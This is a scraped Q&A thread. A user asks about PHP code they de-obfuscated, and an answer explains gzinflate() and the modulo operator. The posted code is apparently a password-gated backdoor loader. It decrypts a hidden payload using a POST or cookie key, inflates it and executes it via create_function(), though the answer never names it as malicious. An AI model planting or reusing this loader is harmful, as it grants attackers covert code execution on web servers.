dsjfrkvn818747 2016-01-02 06:55
浏览 46
已采纳

加密的PHP代码

Issue

I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.

Code

<?php

$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
    $posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
    for ($counter=0; $counter < 15324; $counter++)    {
        $idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
        $posted.=$idk[$counter];
    }

    if($idk = @gzinflate($idk)) {
        if (isset($_POST['posted']))
            @setcookie('posted', $_POST['posted']);
        $counter = create_function('', $idk);
        unset($idk, $posted);
        $counter();
    }
}

The $idk variable is already a value that contains a long string that's being base64 decoded.

What I Don't Understand

I understand almost all of the code, but I don't get what % 256 does in here and also I don't know what gzinflate() does.

  • 写回答

1条回答 默认 最新

  • dtc66318 2016-01-02 07:13
    关注

    So, gzinflate() un-compresses input data that is compressed with the zlib DEFLATE algorithm. The corresponding function to compress or deflate an uncompressed string is called gzdeflate(), and it's manual page provides a bit more information:

    This function compresses the given string using the DEFLATE data format.

    For details on the DEFLATE compression algorithm see the document "DEFLATE Compressed Data Format Specification version 1.3" (RFC 1951). Sparing a few details, this is similar to compressing a file using gzip myfile.txt on the Linux command line, which would create the compressed file myfile.txt.gz. In short, this is uncompressing compressed data assigned to $idk.

    $variable % 256 returns the remainder of dividing $variable by 256. If I set $variable to 258, $variable % 256 would be 2. This is often used when you want to see if a number is cleanly-divisible by another number. If I wanted to show a status-update every 100 times of a loop, for example, I might do:

    <?php

for ($i = 1; $i <= 1000; ++$i)
{
    // Do something on each loop.

    if (($i % 100) == 0)
    {
        echo sprintf("Loop %d of 1000; %d percent complete.
", $i, $i / 1000 * 100);
    }
}

    But there are obviously many other uses.

    As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥50 有数据,怎么用matlab求全要素生产率
  • ¥15 TI的insta-spin例程
  • ¥15 完成下列问题完成下列问题
  • ¥15 C#算法问题, 不知道怎么处理这个数据的转换
  • ¥15 YoloV5 第三方库的版本对照问题
  • ¥15 请完成下列相关问题!
  • ¥15 drone 推送镜像时候 purge: true 推送完毕后没有删除对应的镜像,手动拷贝到服务器执行结果正确在样才能让指令自动执行成功删除对应镜像,如何解决?
  • ¥15 求daily translation(DT)偏差订正方法的代码
  • ¥15 js调用html页面需要隐藏某个按钮
  • ¥15 ads仿真结果在圆图上是怎么读数的